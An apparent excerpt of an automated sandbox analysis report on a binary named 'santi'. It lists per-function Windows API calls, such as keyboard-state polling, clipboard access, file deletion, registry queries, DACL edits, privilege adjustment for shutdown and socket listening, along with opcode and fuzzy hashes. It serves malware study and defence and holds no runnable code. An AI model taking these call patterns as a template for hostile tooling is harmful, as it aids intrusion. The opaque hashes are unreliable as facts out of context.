                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                • API String ID: 835046349-2428617273
                                                                • Opcode ID: feed9877c3ef9585c84266ea31cc87da1f2789379af95b72ece23917c939a9d3
                                                                • Instruction ID: d17ffb463b526f0419870b12669306fc49cf6d1c709bc7ffaa1455b3262500d1
                                                                • Opcode Fuzzy Hash: feed9877c3ef9585c84266ea31cc87da1f2789379af95b72ece23917c939a9d3
                                                                • Instruction Fuzzy Hash: 0BA14FB2418344ABC311EB95C885DAFB7ECEF98704F840C2EF58587191EB34D959CB62
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00331B50
                                                                • _wcscmp.LIBCMT ref: 00331B65
                                                                • _wcscmp.LIBCMT ref: 00331B7C
                                                                • GetFileAttributesW.KERNEL32(?), ref: 00331B8E
                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00331BA8
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00331BC0
                                                                • FindClose.KERNEL32(00000000), ref: 00331BCB
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00331BE7
                                                                • _wcscmp.LIBCMT ref: 00331C0E
                                                                • _wcscmp.LIBCMT ref: 00331C25
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00331C37
                                                                • SetCurrentDirectoryW.KERNEL32(003939FC), ref: 00331C55
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00331C5F
                                                                • FindClose.KERNEL32(00000000), ref: 00331C6C
                                                                • FindClose.KERNEL32(00000000), ref: 00331C7C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                • String ID: *.*
                                                                • API String ID: 1803514871-438819550
                                                                • Opcode ID: f35304e462152ab7358976354d0034971194f14dfe80c8ebc2b5a82e3b76ee05
                                                                • Instruction ID: 5ec8bd6f3bc128bbdbbc1679233211c1fa6d6ae6df85c8f00c86eda0298c6b74
                                                                • Opcode Fuzzy Hash: f35304e462152ab7358976354d0034971194f14dfe80c8ebc2b5a82e3b76ee05
                                                                • Instruction Fuzzy Hash: 1D31D572A012196FDF26AFB0DC89BDE77ACAF0A320F104155F815E7090EBB0DE458A64
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00331CAB
                                                                • _wcscmp.LIBCMT ref: 00331CC0
                                                                • _wcscmp.LIBCMT ref: 00331CD7
                                                                  • Part of subcall function 00326BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00326BEF
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00331D06
                                                                • FindClose.KERNEL32(00000000), ref: 00331D11
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00331D2D
                                                                • _wcscmp.LIBCMT ref: 00331D54
                                                                • _wcscmp.LIBCMT ref: 00331D6B
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00331D7D
                                                                • SetCurrentDirectoryW.KERNEL32(003939FC), ref: 00331D9B
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00331DA5
                                                                • FindClose.KERNEL32(00000000), ref: 00331DB2
                                                                • FindClose.KERNEL32(00000000), ref: 00331DC2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                • String ID: *.*
                                                                • API String ID: 1824444939-438819550
                                                                • Opcode ID: efd133b49ad5349226ce1997a86dd10992fd103e6b5d84a90852a35f7f44e1be
                                                                • Instruction ID: 2f9047804832be3570e079bb1ceaaab90853528776cb81ba4781bb437de4e056
                                                                • Opcode Fuzzy Hash: efd133b49ad5349226ce1997a86dd10992fd103e6b5d84a90852a35f7f44e1be
                                                                • Instruction Fuzzy Hash: 2C31FB31A016196BCF27AFA0DC89BEE77ACAF46320F114551E801A70D1DBB0DE45CF54
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                • API String ID: 2102423945-2023335898
                                                                • Opcode ID: b53841a3bd5872b0e5055f6121c6aabbe71529656f777f593b3711dc80576182
                                                                • Instruction ID: a71c0732714e26a2695b0d8ca2dda7b696e7771e2d795aefbe8a485a2398b04d
                                                                • Opcode Fuzzy Hash: b53841a3bd5872b0e5055f6121c6aabbe71529656f777f593b3711dc80576182
                                                                • Instruction Fuzzy Hash: 8182F171D2425ACFCF25CF99C880AADB7B1FF48310F6981A9D859AB351E7709D94CB80
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 003309DF
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003309EF
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003309FB
                                                                • __wsplitpath.LIBCMT ref: 00330A59
                                                                • _wcscat.LIBCMT ref: 00330A71
                                                                • _wcscat.LIBCMT ref: 00330A83
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00330A98
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330AAC
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330ADE
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330AFF
                                                                • _wcscpy.LIBCMT ref: 00330B0B
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00330B4A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                • String ID: *.*
                                                                • API String ID: 3566783562-438819550
                                                                • Opcode ID: 3035155b3eb563fc54165fa83293c3e1b8b74e241fd142e097146bba56e59829
                                                                • Instruction ID: 37cd7e09eb00734a2827673d0aaad3a2db9c91008c370bf3745f8e0c1b98f5f0
                                                                • Opcode Fuzzy Hash: 3035155b3eb563fc54165fa83293c3e1b8b74e241fd142e097146bba56e59829
                                                                • Instruction Fuzzy Hash: 746167725043059FD715EF60C894AAEB3E8FF89310F05892EF989C7252DB31EA45CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60$888 8
                                                                • API String ID: 0-2058216945
                                                                • Opcode ID: 5a056e08940a2658ac3fc0f07fa95bfc17559e769fbeee6518790b193e3aacf1
                                                                • Instruction ID: e6e6702b1fdb722dbccdb07a99ada24d95c36d5acc055486ddb3068bd53da0af
                                                                • Opcode Fuzzy Hash: 5a056e08940a2658ac3fc0f07fa95bfc17559e769fbeee6518790b193e3aacf1
                                                                • Instruction Fuzzy Hash: CF729071E1425A9BDF25CF59C8807AEB7B5FF08310F5581AAE809EB284DB709E41CF90
                                                                APIs
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
                                                                  • Part of subcall function 0031ABBB: GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
                                                                  • Part of subcall function 0031ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0031A69F,?,?,?), ref: 0031ABF0
                                                                  • Part of subcall function 0031ABBB: HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
                                                                  • Part of subcall function 0031AC56: GetProcessHeap.KERNEL32(00000008,0031A6B5,00000000,00000000,?,0031A6B5,?), ref: 0031AC62
                                                                  • Part of subcall function 0031AC56: HeapAlloc.KERNEL32(00000000,?,0031A6B5,?), ref: 0031AC69
                                                                  • Part of subcall function 0031AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0031A6B5,?), ref: 0031AC7A
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0031A6D0
                                                                • _memset.LIBCMT ref: 0031A6E5
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0031A704
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A715
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0031A752
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0031A76E
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A78B
                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0031A79A
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0031A7A1
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0031A7C2
                                                                • CopySid.ADVAPI32(00000000), ref: 0031A7C9
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0031A7FA
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0031A820
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0031A834
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                • String ID:
                                                                • API String ID: 3996160137-0
                                                                • Opcode ID: 2b3644ef5ba4ce34694aba3cb91bdbbb53ae6ac247b53d9bb4b7c4e407f4ef13
                                                                • Instruction ID: ee63919714d9394fc3936ed6ba8c643f210defbbafa0d49f525dcf2395573241
                                                                • Opcode Fuzzy Hash: 2b3644ef5ba4ce34694aba3cb91bdbbb53ae6ac247b53d9bb4b7c4e407f4ef13
                                                                • Instruction Fuzzy Hash: A8517E71A01209AFDF06DF91DC44EEEBBB9FF08311F048129F811AB291D7749A46CB61
                                                                APIs
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00325FA6,?), ref: 00326ED8
                                                                  • Part of subcall function 003272CB: GetFileAttributesW.KERNEL32(?,00326019), ref: 003272CC
                                                                • _wcscat.LIBCMT ref: 00326441
                                                                • __wsplitpath.LIBCMT ref: 0032645F
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00326474
                                                                • _wcscpy.LIBCMT ref: 003264A3
                                                                • _wcscat.LIBCMT ref: 003264B8
                                                                • _wcscat.LIBCMT ref: 003264CA
                                                                • DeleteFileW.KERNEL32(?), ref: 003264DA
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003264EB
                                                                • FindClose.KERNEL32(00000000), ref: 00326506
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                • String ID: \*.*
                                                                • API String ID: 2643075503-1173974218
                                                                • Opcode ID: 56e6d5d34f28747dfa0db244b3672500e4711797bb69883fe60e3bf618a80e30
                                                                • Instruction ID: 39032e08c06beb683326595cfb914f8f355c1af552e521bebad3618aed8a698a
                                                                • Opcode Fuzzy Hash: 56e6d5d34f28747dfa0db244b3672500e4711797bb69883fe60e3bf618a80e30
                                                                • Instruction Fuzzy Hash: E631C5B24093849AC722EBA49C85EDF77DCAF56300F00491EF5D8C7141EA35D50D87A7
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0034328E
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0034332D
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003433C5
                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00343604
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00343611
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1240663315-0
                                                                • Opcode ID: b361b79e218a8005dd81635844d3441d667cc8e2fc7b3dac09eab3e06e93178f
                                                                • Instruction ID: 319be71b598c7dbd0b009b79b32d5cd9696d0c30cf27f75ac3d8a039f48ba2e5
                                                                • Opcode Fuzzy Hash: b361b79e218a8005dd81635844d3441d667cc8e2fc7b3dac09eab3e06e93178f
                                                                • Instruction Fuzzy Hash: E6E15A31604210AFCB15DF29C995E6ABBE8EF89714F0488ADF54ADB2A1DB30ED05CF51
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00322B5F
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00322BE0
                                                                • GetKeyState.USER32(000000A0), ref: 00322BFB
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00322C15
                                                                • GetKeyState.USER32(000000A1), ref: 00322C2A
                                                                • GetAsyncKeyState.USER32(00000011), ref: 00322C42
                                                                • GetKeyState.USER32(00000011), ref: 00322C54
                                                                • GetAsyncKeyState.USER32(00000012), ref: 00322C6C
                                                                • GetKeyState.USER32(00000012), ref: 00322C7E
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00322C96
                                                                • GetKeyState.USER32(0000005B), ref: 00322CA8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: 65a751cd854e029770b68e2f18897185dcdbdde59bc5f997dbc81cdab4828805
                                                                • Instruction ID: 200058312b6b87be30175b5145ac0c8bcd0d0598b70ff432dbaed22379c58d13
                                                                • Opcode Fuzzy Hash: 65a751cd854e029770b68e2f18897185dcdbdde59bc5f997dbc81cdab4828805
                                                                • Instruction Fuzzy Hash: 9241D630A047E97DFF339B60AC043BBBEA06B12314F058059DAC6566C1DBA499C4C7A2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                • String ID:
                                                                • API String ID: 1737998785-0
                                                                • Opcode ID: 6dbb61185b026326ec62de6b6972efa0adbff02f2f51511148954d7d633f2e9f
                                                                • Instruction ID: 5b2c7648587a94d3fb9a884219f995d9498260b13900e081cd80e1af289612c0
                                                                • Opcode Fuzzy Hash: 6dbb61185b026326ec62de6b6972efa0adbff02f2f51511148954d7d633f2e9f
                                                                • Instruction Fuzzy Hash: 2021AE31700110AFDB12AF65DC9AB2DB7ACEF45710F05C41AF90ADB2A1CBB0ED008B90
                                                                APIs
                                                                  • Part of subcall function 00319ABF: CLSIDFromProgID.OLE32 ref: 00319ADC
                                                                  • Part of subcall function 00319ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00319AF7
                                                                  • Part of subcall function 00319ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00319B05
                                                                  • Part of subcall function 00319ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00319B15
                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0033C235
                                                                • _memset.LIBCMT ref: 0033C242
                                                                • _memset.LIBCMT ref: 0033C360
                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0033C38C
                                                                • CoTaskMemFree.OLE32(?), ref: 0033C397
                                                                Strings
                                                                • NULL Pointer assignment, xrefs: 0033C3E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                • String ID: NULL Pointer assignment
                                                                • API String ID: 1300414916-2785691316
                                                                • Opcode ID: caaba52ec957c383156421745eb4394f00c728397c5228ac422a5e82612ca3c7
                                                                • Instruction ID: 2c5a236d97f882e9e0572242a0f4148624ac1d151f291a7b2072d59b42d87a8a
                                                                • Opcode Fuzzy Hash: caaba52ec957c383156421745eb4394f00c728397c5228ac422a5e82612ca3c7
                                                                • Instruction Fuzzy Hash: 81914C71D10228ABDB12DF95DC95EEEBBB8EF08710F20812AF515B7291DB705A45CFA0
                                                                APIs
                                                                  • Part of subcall function 0031B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0031B180
                                                                  • Part of subcall function 0031B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0031B1AD
                                                                  • Part of subcall function 0031B134: GetLastError.KERNEL32 ref: 0031B1BA
                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00327A0F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                • String ID: $@$SeShutdownPrivilege
                                                                • API String ID: 2234035333-194228
                                                                • Opcode ID: b3e5ba41007c3b4e4d7d51a3f21e3afa6c1a8775e09cd1e184184978a8a2fad5
                                                                • Instruction ID: 2ec397d947dd7424ba24d60ffcacdcef6efe4e72307aa19cc3d6bd73522f0af1
                                                                • Opcode Fuzzy Hash: b3e5ba41007c3b4e4d7d51a3f21e3afa6c1a8775e09cd1e184184978a8a2fad5
                                                                • Instruction Fuzzy Hash: E301F7717592326AF72B1668AC5BBBF725CBB04760F154824FD03A22D2D6A09E0081B4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60$8
                                                                • API String ID: 0-623596573
                                                                • Opcode ID: 06b2caa56b4c298b2946a4dff3196bc354ffe2eb6e2244f6979d2a403c4ee012
                                                                • Instruction ID: 5137b36fcb4c71a9f8b0a0c192e0c6bc5dd3bf349d20be47847e5bcdfe9ae97f
                                                                • Opcode Fuzzy Hash: 06b2caa56b4c298b2946a4dff3196bc354ffe2eb6e2244f6979d2a403c4ee012
                                                                • Instruction Fuzzy Hash: 1D92AB70E2025ACBDF25CF59C8807BDB7B1BB54300F65819AE85AAB284D770ADD1CF91
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00338CA8
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338CB7
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00338CD3
                                                                • listen.WSOCK32(00000000,00000005), ref: 00338CE2
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338CFC
                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00338D10
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
